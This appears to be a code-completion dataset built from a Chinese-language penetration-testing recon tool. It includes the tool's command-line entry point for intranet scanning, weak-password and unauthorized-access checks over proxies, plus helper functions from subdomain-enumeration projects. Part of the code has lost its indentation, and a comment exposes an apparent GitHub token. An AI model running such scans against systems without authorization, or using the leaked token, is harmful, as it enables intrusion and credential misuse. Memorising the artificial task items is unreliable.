# param_Links = []
# run_cSubnet(CIP_List, Subdomains_ips, notCDNSubdomains, param_Links)
alive_Web = ['']
detect_webVul(alive_Web)
elif getSocks == 1:
# 从fofa收集代理
getSocksProxy()
if __name__ == '__main__':
_init()
def _init():
global domain, cSubnet, save_fold_path, excel, excel_name, excelSavePath, proxy, \
requests_proxies, isIntranet, xlsxFileWB, weak, CIP_List, allTargets_List, \
allTargets_Queue, masNmapFile, newDomains, ip_count, fofaTitle, ksubdomain, justInfoGather, socksProxysDict, kuaidaili_thread_num
# python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -p 1.1.1.1:1111 内网:使用代理扫描内网C段资产:web标题和漏洞
# proxychains4 python3 %prog -n 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx 内网:使用proxychains4代理扫描C段的服务漏洞:弱口令和未授权
# python3 %prog --mn masNmap.xlsx 外网:扫描masscan和nmap的结果
# python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -v 1 内网:使用wifi或者vpn的情况下扫web标题和漏洞
banner()
checkVersion()
usage = '\n\t' \
'python3 %prog -d domain.com\n\t' \
'python3 %prog -d domain.com --justInfoGather 1\n\t' \
'python3 %prog -d domain.com --ksubdomain 0\n\t' \
'python3 %prog -c 192.168.1.0,192.168.2.0,192.168.3.0\n\t' \
'python3 %prog -f url.txt\n\t' \
'python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -p 1.1.1.1:1111\n\t' \
'python3 %prog -n 1 -f url.txt -p 1.1.1.1:1111 --web 1\n\t' \
'python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -v 1\n\t' \
'proxychains4 python3 %prog -n 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx\n\t' \
'proxychains4 python3 %prog -n 1 -w 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx\n\t' \
'python3 %prog --mn masNmap.xlsx\n\t' \
'python3 %prog --mn masNmap.xlsx -w 1\n\t' \
'python3 %prog --fofaTitle 大学\n\t' \
'python3 %prog --domainFile domain.txt\n\t'
parse = OptionParser(usage=usage)
parse.add_option('-d', '--domain', dest='domain', type='string', help='target domain')
parse.add_option('-c', '--cSubnet', dest='cSubnet', type='string', help='target cSubnet')
# parse.add_option('--proxyFlag', dest='proxyFlag', type='int', default=0, help='0:No,1:kuaidaili,2:tencentcs') # 0不使用代理扫描,1使用快代理扫描,2使用腾讯云函数扫描
parse.add_option('-n', '--intranet', dest='isIntranet', type='int', default=0, help='Scan intranet value set to 1') # 扫描内网, 值为1扫内网, 默认为0
parse.add_option('-p', '--proxy', dest='proxy', type='string', default=None, help='Intranet proxy socks5 socks4') # 代理,socks5和socks4, 默认为None,可用于外网扫描,也可以用于内网扫描
parse.add_option('-f', '--file', dest='File', type='string', default=None, help='/result/2ddcaa3ebbd0/172.18.82.0.xlsx') # 扫描内网的服务漏洞-未授权和弱口令
parse.add_option('-w', '--weak', dest='weak', type='int', default=None, help='run weak password script') # 内网弱口令是否要跑
parse.add_option('-v', '--vpn', dest='vpn', type='int', default=None, help='Run in the case of vpn') # 在vpn的情况下跑
parse.add_option('--web', dest='web', type='int', default=None, help='detect web in Intranet') # 跑内网的web漏洞
parse.add_option('--mn', dest='masNmapFile', type='str', default=None, help='run masscan nmap result') # 跑masscan和nmap的结果
parse.add_option('--fofaTitle', dest='fofaTitle', type='str', default=None, help='run fofa title') # 跑fofa的title
parse.add_option('--domainFile', dest='domainFile', type='str', default=None, help='run domain title') # 跑多个域名
parse.add_option('--ksubdomain', dest='ksubdomain', type='int', default=1, help='not run ksubdomain') # 不使用ksubdomain跑子域名
parse.add_option('--test', dest='testDemo', type='int', default=0, help='if test=1 then run testDemo') # 测试某个功能
parse.add_option('--justInfoGather', dest='justInfoGather', type='int', default=0, help='just infoGather, not detect vul') # 只信息收集,不跑漏洞
parse.add_option('--getSocks', dest='getSocks', type='int', default=0, help='get socks') # 获取socks代理
options, args = parse.parse_args()
domain, cSubnet, isIntranet, proxy, File, weak, vpn, masNmapFile, fofaTitle, domainFile, web, ksubdomain, justInfoGather, testDemo, getSocks = options.domain, options.cSubnet, options.isIntranet, options.proxy, options.File, options.weak, options.vpn, options.masNmapFile, options.fofaTitle, options.domainFile, options.web, options.ksubdomain, options.justInfoGather, options.testDemo, options.getSocks
# 所有目标
allTargets_List = []
allTargets_Queue = Queue(-1)
# C段IP列表
CIP_List = []
# C段出现的IP个数
ip_count = Counter()
# 和目标资产相关联的新的根域名
newDomains = []
# 代理
socksProxysDict = {"baidu": [], "google": []}
print(domain, cSubnet, isIntranet, proxy, File)
# requests代理
# 内网代理
if proxy:
requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
# 外网代理
else:
cf = configparser.ConfigParser()
cf.read("./iniFile/config.ini")
# 快代理配置
kuaidaili_tunnel = cf.get('kuaidaili', 'tunnel')
kuaidaili_username = cf.get('kuaidaili', 'username')
kuaidaili_password = cf.get('kuaidaili', 'password')
kuaidaili_thread_num = cf.get('kuaidaili', 'thread_num')
kuaidaili_switch = cf.get('kuaidaili', 'switch')
if kuaidaili_switch == "on":
requests_proxies = {
"http": "http://%(user)s:%(pwd)s@%(proxy)s/" % {"user": kuaidaili_username, "pwd": kuaidaili_password, "proxy": kuaidaili_tunnel},
"https": "http://%(user)s:%(pwd)s@%(proxy)s/" % {"user": kuaidaili_username, "pwd": kuaidaili_password, "proxy": kuaidaili_tunnel}
}
cprint('-' * 50 + 'Detect kuaidaili Config'.format(domain) + '-' * 50, 'green') # 验证代理是否有效
try:
kuaidaili_ips = []
for i in range(3):
res = requests.get(url='https://www.taobao.com/help/getip.php', proxies=requests_proxies, timeout=10, verify=False)
print(res.text)
ip = re.findall(r'ip:"([\d\.]+)"', res.text)[0]
print("此次请求IP: {}".format(ip))
kuaidaili_ips.append(ip)
if len(kuaidaili_ips) == 3:
cprint("快代理配置验证通过", 'red')
else:
cprint("快代理配置验证失败", 'red')
exit()
except Exception as OSError:
print("快代理配置错误或者快代理请求超时,请检查 {}".format(OSError.args))
exit()
else:
requests_proxies = None
# 分割C段,获取ip
if cSubnet:
CIP_List = cSubnet.split(',')
for CIP in CIP_List:
for ip in IP('{}/24'.format(CIP)):
allTargets_Queue.put(str(ip))
allTargets_List.append(str(ip))
# 扫描外网时加载文件扫描
if File and not isIntranet:
with open(File, 'rt') as f:
for each in f.readlines():
allTargets_Queue.put(each.strip())
allTargets_List.append(each.strip())
# 创建目录
# 扫描内网漏洞(Web或者服务)
if File and isIntranet:
if not web: # 扫描内网服务漏洞
save_fold_path, _excel_name = File.rsplit('/', 1)
excel_name = _excel_name.rsplit('.', 1)[0] + '_ServiceVul'
xlsxFileWB = openpyxl.load_workbook(File) # 打开文件
else: # 扫描内网web漏洞
save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
os.makedirs(save_fold_path)
with open(File, 'rt') as f:
for each in f.readlines():
allTargets_Queue.put(each.strip())
allTargets_List.append(each.strip())
# 扫描外网或者外网读取file.txt或者读取masNmap.xlsx时
else:
try:
save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
os.makedirs(save_fold_path)
except Exception:
pass
excel = openpyxl.Workbook()
excel.remove(excel[excel.sheetnames[0]]) # 删除第一个默认的表
if domain and cSubnet:
cprint('Error: domain and cSubnet can only pass one', 'red')
exit(0)
elif domain and not cSubnet: # 跑域名
cprint('-' * 50 + 'Start {} information collection'.format(domain) + '-' * 50, 'green')
excel_name = domain
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_subdomain()
elif not domain and cSubnet: # 跑C段
if isIntranet == 0: # 外网C段
cprint('-' * 50 + 'Start {} cSubnet collection'.format(cSubnet) + '-' * 50, 'green')
excel_name = cSubnet
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('C Subnet: {}'.format(CIP_List))
run_cSubnet(CIP_List, {}, [], [])
elif isIntranet == 1:
if proxy or vpn: # 内网C段的扫描
cprint('-' * 50 + 'Start {} cSubnet intranet scan'.format(cSubnet) + '-' * 50, 'green')
excel_name = cSubnet
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('C Subnet: {}'.format(CIP_List))
run_intranet_cSubnet()
else:
cprint('Error: Please pass in the agent when scanning the intranet', 'red')
elif File:
if isIntranet and not web: # 扫描内网的服务漏洞
cprint('-' * 50 + 'Open {} Scanning for service vulnerabilities on the intranet'.format(File) + '-' * 50, 'green')
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('xlsxFile: {}'.format(File))
run_intranet_ServiceVul()
elif isIntranet and web: # 扫描内网Web漏洞
cprint('-' * 50 + 'Open {} Scanning for intranet Web vulnerabilities'.format(File) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_intranetWeb()
else: # 扫描外网漏洞
cprint('-' * 50 + 'Open {} Scanning'.format(File) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('open File: {}'.format(File))
run_file()
elif masNmapFile: # 跑masscan和nmap的结果
cprint('-' * 50 + 'Open masNmap File {} to Scanning'.format(masNmapFile) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_masNmap()
elif fofaTitle: # 跑fofa Title漏洞
cprint('-' * 50 + 'Run Fofa Search Title {} to Scanning'.format(fofaTitle) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_fofaTitle()
elif domainFile: # 跑域名文件
cprint('-' * 50 + 'Run Domain File {} to information collection'.format(domainFile) + '-' * 50, 'green')
with open(domainFile, 'rt') as f:
for each in f.readlines():
# C段IP列表
CIP_List = []
# C段出现的IP个数
ip_count = Counter()
# 和目标资产相关联的新的根域名
newDomains = []
domain = each.strip()
cprint('-' * 50 + 'Start {} information collection'.format(domain) + '-' * 50, 'green')
excel_name = domain
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
excel = openpyxl.Workbook()
excel.remove(excel[excel.sheetnames[0]]) # 删除第一个默认的表
run_subdomain()
elif testDemo == 1:
# 测试代码
# domain = ''
# save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
# os.makedirs(save_fold_path)
# excel_name = domain
# excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
#
# CIP_List = []
# Subdomains_ips = {}
# notCDNSubdomains = []
# param_Links = []
# run_cSubnet(CIP_List, Subdomains_ips, notCDNSubdomains, param_Links)
alive_Web = ['']
detect_webVul(alive_Web)
elif getSocks == 1:
# 从fofa收集代理
getSocksProxy() | null |
189,268 | import re
import sys
from aiodns import DNSResolver
from ipaddress import IPv4Network
from typing import Callable, List, Optional
from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib import hostchecker
NETWORK_REGEX = r'\b({})(?:\:({}))?(?:\/({}))?\b'.format(
IP_REGEX,
PORT_REGEX,
NETMASK_REGEX)
The provided code snippet includes necessary dependencies for implementing the `serialize_ip_range` function. Write a Python function `def serialize_ip_range( ip: str, netmask: str = '24') -> str` to solve the following problem:
Serialize a network range in a constant format, 'x.x.x.x/y'. Parameters ---------- ip: str. A serialized ip in the format 'x.x.x.x'. Extra information like port (':z') or subnet ('/n') will be ignored. netmask: str. The subnet subdivision, represented by a 2 digit netmask. Returns ------- out: str. The network OSI address, like '192.168.0.0/24'.
Here is the function:
def serialize_ip_range(
ip: str,
netmask: str = '24') -> str:
"""
Serialize a network range in a constant format, 'x.x.x.x/y'.
Parameters
----------
ip: str.
A serialized ip in the format 'x.x.x.x'.
Extra information like port (':z') or subnet ('/n')
will be ignored.
netmask: str.
The subnet subdivision, represented by a 2 digit netmask.
Returns
-------
out: str.
The network OSI address, like '192.168.0.0/24'.
"""
__ip_matches = re.search(NETWORK_REGEX, ip, re.IGNORECASE)
if __ip_matches and __ip_matches.groups():
__ip = __ip_matches.group(1)
__netmask = netmask if netmask else __ip_matches.group(3)
if __ip and __netmask:
return str(IPv4Network('{}/{}'.format(__ip, __netmask), strict=False))
elif __ip:
return str(IPv4Network('{}/{}'.format(__ip, '24'), strict=False))
# invalid input ip
return '' | Serialize a network range in a constant format, 'x.x.x.x/y'. Parameters ---------- ip: str. A serialized ip in the format 'x.x.x.x'. Extra information like port (':z') or subnet ('/n') will be ignored. netmask: str. The subnet subdivision, represented by a 2 digit netmask. Returns ------- out: str. The network OSI address, like '192.168.0.0/24'. |
189,269 | import re
import sys
from aiodns import DNSResolver
from ipaddress import IPv4Network
from typing import Callable, List, Optional
from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib import hostchecker
def list_ips_in_network_range(iprange: str) -> List[str]:
"""
List all the IPs in the range.
Parameters
----------
iprange: str.
A serialized ip range, like '1.2.3.0/24'.
The last digit can be set to anything, it will be ignored.
Returns
-------
out: list.
The list of IPs in the range.
"""
try:
__network = IPv4Network(iprange, strict=False)
return [__address.exploded for __address in __network.hosts()]
except Exception:
return []
async def reverse_single_ip(ip: str, resolver: DNSResolver) -> str:
"""
Reverse a single IP and output the linked CNAME, if it exists.
Parameters
----------
:param ip: IP address to reverse
:param resolver: DNS server to use
Returns
-------
:return str: with the corresponding CNAME or None
"""
try:
__host = await resolver.gethostbyaddr(ip)
return __host.name if __host else ''
except Exception:
return ''
def log_query(ip: str) -> None:
"""
Display the current query in the console.
Parameters
----------
ip: str.
Queried ip.
Results
-------
out: None.
"""
sys.stdout.write(chr(27) + '[2K' + chr(27) + '[G')
sys.stdout.write('\r' + ip + ' - ')
sys.stdout.flush()
def log_result(host: str) -> None:
"""
Display the query result in the console.
Parameters
----------
host: str.
Host name returned by the DNS query.
Results
-------
out: None.
"""
if host:
print(host)
The provided code snippet includes necessary dependencies for implementing the `reverse_all_ips_in_range` function. Write a Python function `async def reverse_all_ips_in_range(iprange: str, callback: Callable, nameservers: Optional[List[str]] = None) -> None` to solve the following problem:
Reverse all the IPs stored in a network range. All the queries are made concurrently. Parameters ---------- iprange: str. An IPv4 range formated as 'x.x.x.x/y'. The last 2 digits of the ip can be set to anything, they will be ignored. callback: Callable. Arbitrary postprocessing function. nameservers: List[str]. Optional list of DNS servers. Returns ------- out: None.
Here is the function:
async def reverse_all_ips_in_range(iprange: str, callback: Callable, nameservers: Optional[List[str]] = None) -> None:
"""
Reverse all the IPs stored in a network range.
All the queries are made concurrently.
Parameters
----------
iprange: str.
An IPv4 range formated as 'x.x.x.x/y'.
The last 2 digits of the ip can be set to anything,
they will be ignored.
callback: Callable.
Arbitrary postprocessing function.
nameservers: List[str].
Optional list of DNS servers.
Returns
-------
out: None.
"""
__resolver = DNSResolver(timeout=4, nameservers=nameservers)
for __ip in list_ips_in_network_range(iprange):
log_query(__ip)
__host = await reverse_single_ip(ip=__ip, resolver=__resolver)
callback(__host)
log_result(__host) | Reverse all the IPs stored in a network range. All the queries are made concurrently. Parameters ---------- iprange: str. An IPv4 range formated as 'x.x.x.x/y'. The last 2 digits of the ip can be set to anything, they will be ignored. callback: Callable. Arbitrary postprocessing function. nameservers: List[str]. Optional list of DNS servers. Returns ------- out: None. |
189,270 | import re
import sys
from aiodns import DNSResolver
from ipaddress import IPv4Network
from typing import Callable, List, Optional
from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib import hostchecker
The provided code snippet includes necessary dependencies for implementing the `generate_postprocessing_callback` function. Write a Python function `def generate_postprocessing_callback(target: str, **allhosts: List[str]) -> Callable` to solve the following problem:
Postprocess the query results asynchronously too, instead of waiting for the querying stage to be completely finished. Parameters ---------- target: str. The domain wanted as TLD. allhosts: List. A collection of all the subdomains -of target- found so far. Returns ------- out: Callable. A function that will update the collection of target subdomains when the query result is satisfying.
Here is the function:
def generate_postprocessing_callback(target: str, **allhosts: List[str]) -> Callable:
"""
Postprocess the query results asynchronously too, instead of waiting for
the querying stage to be completely finished.
Parameters
----------
target: str.
The domain wanted as TLD.
allhosts: List.
A collection of all the subdomains -of target- found so far.
Returns
-------
out: Callable.
A function that will update the collection of target subdomains
when the query result is satisfying.
"""
def append_matching_hosts(host: str) -> None:
if host and target in host:
for __name, __hosts in allhosts.items():
if host not in __hosts:
__hosts.append(host)
return append_matching_hosts | Postprocess the query results asynchronously too, instead of waiting for the querying stage to be completely finished. Parameters ---------- target: str. The domain wanted as TLD. allhosts: List. A collection of all the subdomains -of target- found so far. Returns ------- out: Callable. A function that will update the collection of target subdomains when the query result is satisfying. |
189,271 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
from typing import Union
import random
The provided code snippet includes necessary dependencies for implementing the `splitter` function. Write a Python function `async def splitter(links)` to solve the following problem:
Method that tries to remove duplicates LinkedinLists pulls a lot of profiles with the same name. This method tries to remove duplicates from the list. :param links: list of links to remove duplicates from :return: unique-ish list
Here is the function:
async def splitter(links):
"""
Method that tries to remove duplicates
LinkedinLists pulls a lot of profiles with the same name.
This method tries to remove duplicates from the list.
:param links: list of links to remove duplicates from
:return: unique-ish list
"""
unique_list = []
name_check = []
for url in links:
tail = url.split("/")[-1]
if len(tail) == 2 or tail == "zh-cn":
tail = url.split("/")[-2]
name = tail.split("-")
if len(name) > 1:
joined_name = name[0] + name[1]
else:
joined_name = name[0]
if joined_name not in name_check:
unique_list.append(url)
name_check.append(joined_name)
return unique_list | Method that tries to remove duplicates LinkedinLists pulls a lot of profiles with the same name. This method tries to remove duplicates from the list. :param links: list of links to remove duplicates from :return: unique-ish list |
189,272 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
from typing import Union
import random
The provided code snippet includes necessary dependencies for implementing the `filter` function. Write a Python function `def filter(lst)` to solve the following problem:
Method that filters list :param lst: list to be filtered :return: new filtered list
Here is the function:
def filter(lst):
"""
Method that filters list
:param lst: list to be filtered
:return: new filtered list
"""
if lst is None:
return []
if not isinstance(lst, set):
lst = set(lst) # Remove duplicates.
new_lst = []
for item in lst:
item = str(item)
if (item[0].isalpha() or item[0].isdigit()) and ('xxx' not in item) and ('..' not in item):
item = item.replace('252f', '').replace('2F', '').replace('2f', '')
new_lst.append(item.lower())
return new_lst | Method that filters list :param lst: list to be filtered :return: new filtered list |
189,273 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
from typing import Union
import random
The provided code snippet includes necessary dependencies for implementing the `get_delay` function. Write a Python function `def get_delay() -> float` to solve the following problem:
Method that is used to generate a random delay
Here is the function:
def get_delay() -> float:
"""Method that is used to generate a random delay"""
return random.randint(1, 3) - .5 | Method that is used to generate a random delay |
189,274 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
from typing import Union
import random
async def search(text: str) -> bool:
"""Helper function to check if Google has blocked traffic.
:param text: See if certain text is returned which means Google is blocking us
:return bool:
"""
for line in text.strip().splitlines():
if 'This page appears when Google automatically detects requests coming from your computer network' in line \
or 'http://www.google.com/sorry/index' in line or 'https://www.google.com/sorry/index' in line:
# print('\tGoogle is blocking your IP due to too many automated requests, wait or change your IP')
return True
return False
The provided code snippet includes necessary dependencies for implementing the `google_workaround` function. Write a Python function `async def google_workaround(visit_url: str) -> Union[bool, str]` to solve the following problem:
Function that makes a request on our behalf, if Google starts to block us :param visit_url: Url to scrape :return: Correct html that can be parsed by BS4
Here is the function:
async def google_workaround(visit_url: str) -> Union[bool, str]:
"""
Function that makes a request on our behalf, if Google starts to block us
:param visit_url: Url to scrape
:return: Correct html that can be parsed by BS4
"""
url = 'https://websniffer.cc/'
data = {
'Cookie': '',
'url': visit_url,
'submit': 'Submit',
'type': 'GET&http=1.1',
'uak': str(random.randint(4, 8)) # select random UA to send to Google
}
returned_html = await AsyncFetcher.post_fetch(url, headers={'User-Agent': Core.get_user_agent()}, data=data)
returned_html = "This page appears when Google automatically detects requests coming from your computer network" \
if returned_html == "" else returned_html[0]
if await search(returned_html):
# indicates that google is serving workaround a captcha
# That means we will try out second option which will utilize proxies
return True
# the html we get is malformed for BS4 as there are no greater than or less than signs
if '<html>' in returned_html:
start_index = returned_html.index('<html>')
else:
start_index = returned_html.index('<html')
end_index = returned_html.index('</html>') + 1
correct_html = returned_html[start_index:end_index]
# Slice list to get the response's html
correct_html = ''.join([ch.strip().replace('<', '<').replace('>', '>') for ch in correct_html])
return correct_html | Function that makes a request on our behalf, if Google starts to block us :param visit_url: Url to scrape :return: Correct html that can be parsed by BS4 |
189,275 | import os
import sys
import re
import time
import requests
import random
import argparse
from functools import partial
from colored import fg, bg, attr
from multiprocessing.dummy import Pool
t_tokens = []
import tldextract
def githubApiSearchCode( search, page ):
headers = {"Authorization":"token "+random.choice(t_tokens)}
# {'Authorization': 'token 6571b30a3aa4cdd8a5e0ec6a49033fb47daf373a'}
print(headers)
url = 'https://api.github.com/search/code?s=indexed&type=Code&o=desc&q=' + search + '&page=' + str(page)
print(url)
try:
r = requests.get( url, headers=headers, timeout=5 )
json = r.json()
return json
except Exception as e:
print( "%s[-] error occurred: %s%s" % (fg('red'),e,attr(0)) )
return False | null |
189,276 | import os
import sys
import re
import time
import requests
import random
import argparse
from functools import partial
from colored import fg, bg, attr
from multiprocessing.dummy import Pool
def getRawUrl( result ):
raw_url = result['html_url'];
raw_url = raw_url.replace( 'https://github.com/', 'https://raw.githubusercontent.com/' )
raw_url = raw_url.replace( '/blob/', '/' )
return raw_url;
def doGetCode( url ):
# print( url )
try:
r = requests.get( url, timeout=5 )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
return False
return r.text
if not len(t_tokens):
parser.error( 'auth token is missing' )
t_history = []
import tldextract
def readCode( regexp, source, result ):
url = getRawUrl( result )
print(url)
code = doGetCode( url )
# print(code)
if code:
matches = re.findall( regexp, code )
print(matches)
if matches:
for sub in matches:
sub = sub.replace('2F','').lower().strip()
if len(sub) and not sub in t_history:
t_history.append( sub )
sys.stdout.write( "%s" % sub )
if source:
sys.stdout.write( "\t-> %s" % result['html_url'] )
sys.stdout.write( "\n" ) | null |
189,277 | import re
import sys
import os
import argparse
import time
import hashlib
import random
import multiprocessing
import threading
import socket
import json
from collections import Counter
from Plugins.infoGather.subdomain.Sublist3r.subbrute import subbrute
import dns.resolver
import requests
def write_file(filename, subdomains):
# saving subdomains results to output file
print("%s[+] Saving results to file: %s%s%s%s" % (Y, W, R, os.getcwd()+'/'+filename, W))
with open(str(filename), 'wt') as f:
for subdomain in subdomains:
f.write(subdomain+'\n') | null |
189,278 | import re
import sys
import os
import argparse
import time
import hashlib
import random
import multiprocessing
import threading
import socket
import json
from collections import Counter
from Plugins.infoGather.subdomain.Sublist3r.subbrute import subbrute
import dns.resolver
import requests
The provided code snippet includes necessary dependencies for implementing the `subdomain_sorting_key` function. Write a Python function `def subdomain_sorting_key(hostname)` to solve the following problem:
Sorting key for subdomains This sorting key orders subdomains from the top-level domain at the right reading left, then moving '^' and 'www' to the top of their group. For example, the following list is sorted correctly: [ 'example.com', 'www.example.com', 'a.example.com', 'www.a.example.com', 'b.a.example.com', 'b.example.com', 'example.net', 'www.example.net', 'a.example.net', ]
Here is the function:
def subdomain_sorting_key(hostname):
"""Sorting key for subdomains
This sorting key orders subdomains from the top-level domain at the right
reading left, then moving '^' and 'www' to the top of their group. For
example, the following list is sorted correctly:
[
'example.com',
'www.example.com',
'a.example.com',
'www.a.example.com',
'b.a.example.com',
'b.example.com',
'example.net',
'www.example.net',
'a.example.net',
]
"""
parts = hostname.split('.')[::-1]
if parts[-1] == 'www':
return parts[:-1], 1
return parts, 0 | Sorting key for subdomains This sorting key orders subdomains from the top-level domain at the right reading left, then moving '^' and 'www' to the top of their group. For example, the following list is sorted correctly: [ 'example.com', 'www.example.com', 'a.example.com', 'www.a.example.com', 'b.a.example.com', 'b.example.com', 'example.net', 'www.example.net', 'a.example.net', ] |
189,279 | import re
import optparse
import os
import signal
import sys
import uuid
import random
import ctypes
import dns.resolver
import dns.rdatatype
import json
import multiprocessing
host_match = re.compile(r"((?<=[\s])[a-zA-Z0-9_-]+\.(?:[a-zA-Z0-9_-]+\.?)+(?=[\s]))")
def extract_hosts(data, hostname):
#made a global to avoid re-compilation
global host_match
ret = []
hosts = re.findall(host_match, data)
for fh in hosts:
host = fh.rstrip(".")
#Is this host in scope?
if host.endswith(hostname):
ret.append(host)
return ret | null |
189,280 | import re
import optparse
import os
import signal
import sys
import uuid
import random
import ctypes
import dns.resolver
import dns.rdatatype
import json
import multiprocessing
domain_match = re.compile("([a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*)+")
def trace(*args, **kwargs):
if verbose:
for a in args:
sys.stderr.write(str(a))
sys.stderr.write(" ")
sys.stderr.write("\n")
def extract_subdomains(file_name):
#Avoid re-compilation
global domain_match
subs = {}
sub_file = open(file_name).read()
f_all = re.findall(domain_match, sub_file)
del sub_file
for i in f_all:
if i.find(".") >= 0:
p = i.split(".")[0:-1]
#gobble everything that might be a TLD
while p and len(p[-1]) <= 3:
p = p[0:-1]
#remove the domain name
p = p[0:-1]
#do we have a subdomain.domain left?
if len(p) >= 1:
trace(str(p), " : ", i)
for q in p:
if q :
#domain names can only be lower case.
q = q.lower()
if q in subs:
subs[q] += 1
else:
subs[q] = 1
#Free some memory before the sort...
del f_all
#Sort by freq in desc order
subs_sorted = sorted(subs.keys(), key = lambda x: subs[x], reverse = True)
return subs_sorted | null |
189,281 | import re
import optparse
import os
import signal
import sys
import uuid
import random
import ctypes
import dns.resolver
import dns.rdatatype
import json
import multiprocessing
def run(target, record_type = None, subdomains = "names.txt", resolve_list = "resolvers.txt", process_count = 16):
def print_target(target, record_type = None, subdomains = "names.txt", resolve_list = "resolvers.txt", process_count = 16, output = False, json_output = False, found_subdomains=[],verbose=False):
subdomains_list = []
results_temp = []
run(target, record_type, subdomains, resolve_list, process_count)
for result in run(target, record_type, subdomains, resolve_list, process_count):
(hostname, record_type, response) = result
if not record_type:
result = hostname
else:
result = "%s,%s" % (hostname, ",".join(response).strip(","))
if result not in found_subdomains:
if verbose:
print(result)
subdomains_list.append(result)
return set(subdomains_list) | null |
189,282 | import re
import optparse
import os
import signal
import sys
import uuid
import random
import ctypes
import dns.resolver
import dns.rdatatype
import json
import multiprocessing
def killproc(signum = 0, frame = 0, pid = False):
if not pid:
pid = os.getpid()
if sys.platform.startswith('win'):
try:
kernel32 = ctypes.windll.kernel32
handle = kernel32.OpenProcess(1, 0, pid)
kernel32.TerminateProcess(handle, 0)
except:
#Oah windows.
pass
else:
os.kill(pid, 9)
def signal_init():
#Escliate signal to prevent zombies.
signal.signal(signal.SIGINT, killproc)
try:
signal.signal(signal.SIGTSTP, killproc)
signal.signal(signal.SIGQUIT, killproc)
except:
#Windows
pass | null |
189,283 | import multiprocessing
import gevent
from gevent import monkey
from gevent.queue import PriorityQueue
import re
import dns.resolver
import time
import signal
import os
import glob
from Plugins.infoGather.subdomain.lijiejie.lib.common import is_intranet, load_dns_servers, load_next_sub, print_msg, get_out_file_name, user_abort
import urllib3
def run_process(target, options, process_num, dns_servers, next_subs, scan_count, found_count, queue_size_list,
tmp_dir):
def print_msg(msg=None, left_align=True, line_feed=False):
def load_dns_servers():
def load_next_sub(options):
def get_out_file_name(target, options):
def lijiejieRun(domain):
# options, args = parse_args()
options = {'file': 'subnames.txt', 'full_scan': False, 'i': False, 'threads': 200, 'process': 6, 'output': None}
args = [domain]
start_time = time.time()
# make tmp dirs
tmp_dir = './Plugins/infoGather/subdomain/lijiejie/tmp/%s_%s' % (args[0], int(time.time()))
# tmp_dir = 'tmp/%s_%s' % (args[0], int(time.time()))
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
multiprocessing.freeze_support()
all_process = []
dns_servers = load_dns_servers()
next_subs = load_next_sub(options)
scan_count = multiprocessing.Value('i', 0)
found_count = multiprocessing.Value('i', 0)
queue_size_list = multiprocessing.Array('i', options['process'])
try:
print('[+] Init %s scan process.' % options['process'])
for process_num in range(options['process']):
p = multiprocessing.Process(target=run_process,
args=(args[0], options, process_num,
dns_servers, next_subs,
scan_count, found_count,queue_size_list,
tmp_dir)
)
all_process.append(p)
p.start()
while all_process:
for p in all_process:
if not p.is_alive():
all_process.remove(p)
groups_count = 0
for c in queue_size_list:
groups_count += c
msg = '[*] %s found, %s scanned in %.1f seconds, %s groups left' % (
found_count.value, scan_count.value, time.time() - start_time, groups_count)
print_msg(msg)
time.sleep(1.0)
except KeyboardInterrupt as e:
for p in all_process:
p.terminate()
print('[ERROR] User aborted the scan!')
except Exception as e:
print(e)
msg = '[+] All Done. %s found, %s scanned in %.1f seconds.' % (
found_count.value, scan_count.value, time.time() - start_time)
print_msg(msg, line_feed=True)
out_file_name = './Plugins/infoGather/subdomain/lijiejie/{}'.format(get_out_file_name(args[0], options))
# out_file_name = '{}'.format(get_out_file_name(args[0], options))
with open(out_file_name, 'w') as f:
for _file in glob.glob(tmp_dir + '/*.txt'):
with open(_file,'r') as tmp_f:
content = tmp_f.read()
f.write(content)
print('[+] The output file is %s' % out_file_name) | null |
189,284 | import optparse
import sys
def parse_args():
parser = optparse.OptionParser('usage: %prog [options] target.com',
version="%prog 1.1")
parser.add_option('-f', dest='file', default='subnames.txt',
help='File contains new line delimited subs, default is subnames.txt.')
parser.add_option('--full', dest='full_scan', default=False, action='store_true',
help='Full scan, NAMES FILE subnames_full.txt will be used to brute')
parser.add_option('-i', '--ignore-intranet', dest='i', default=False, action='store_true',
help='Ignore domains pointed to private IPs')
parser.add_option('-t', '--threads', dest='threads', default=200, type=int,
